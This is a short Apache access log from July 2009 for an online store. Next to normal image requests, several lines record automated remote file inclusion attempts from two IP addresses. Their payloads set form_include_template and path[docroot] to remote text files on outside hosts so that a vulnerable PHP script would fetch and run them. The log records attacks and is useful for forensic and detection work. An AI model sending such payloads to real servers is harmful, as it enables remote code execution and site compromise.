76.89.144.147 - - [13/Jul/2009:04:47:31 -0400] "GET /images/items/6300018_THUMB.JPG HTTP/1.1" 200 2091 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1138DC401BF470008D6104L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.254.32.2 - - [13/Jul/2009:04:47:33 -0400] "GET /logs/?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 200 9324 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:47:33 -0400] "GET /logs/access_log.Q109061300%20%20/?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:47:33 -0400] "GET /logs/access_log.Q109060600%20%20/?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:04:47:33 -0400] "GET /?submit=submit&form_include_template=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:47:35 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:47:35 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:47:35 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
